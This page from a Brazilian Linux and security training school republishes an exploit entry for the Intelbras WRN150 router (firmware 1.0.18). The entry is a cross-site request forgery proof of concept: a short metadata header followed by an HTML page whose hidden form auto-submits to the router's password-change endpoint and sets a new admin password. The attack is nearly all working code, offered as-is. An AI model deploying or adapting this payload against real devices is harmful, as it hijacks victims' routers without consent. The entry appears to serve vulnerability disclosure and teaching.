Linux Force Security Cursos de linux e segurança da informação
Portal do Aluno

Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

Intelbras Router WRN150 1.0.18 – Cross-Site Request Forgery

Título da exploração: Intelbras Router WRN150 1.0.18 – falsificação de solicitação entre sites
Data: 2019-10-25
Autor de Exploit: Prof. Joas Antonio
Página inicial do fornecedor: https://www.intelbras.com/pt-br/
Link do software: http://en.intelbras.com.br/node/25896
Versão: 1.0.18
Testado em: Windows
CVE: N / D

####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be

<html>
  <body>
    <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
	<input type="hidden" name="GO" value="system_password.asp">
	<input type="hidden" name="SYSPSC" value="0">
      	<input class="text" type="password" name="SYSOPS" value="hack123"/> 
	<input class="text" type="password" name="SYSPS" value="mrrobot"/> 
	<input class="text" type="password" name="SYSPS2" value="mrrobot"/> 
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
Categorias
Compartilhe esse post

Posts populares

Invista no seu futuro com nossos cursos!

Garanta já a sua vaga.
Linux Force Security Cursos de linux e segurança da informação

Escola especializada em Linux, Segurança da Informação e DevOps. São Paulo – SP

Instagram Facebook X-twitter

Inscreva-se para receber novidades e promoções!

Cursos Linux

Cursos de Segurança

Cursos de DevOps

Institucional

Conteúdos

Fale Conosco

© 2011 – 2025 Linux Force Security – Todos os direitos reservados | Desenvolvido por Cooder Tecnologia

Linux Force Security Cursos de linux e segurança da informação

Seu futuro na tecnologia começa agora! Não deixe essa chance escapar.

Voltar para o site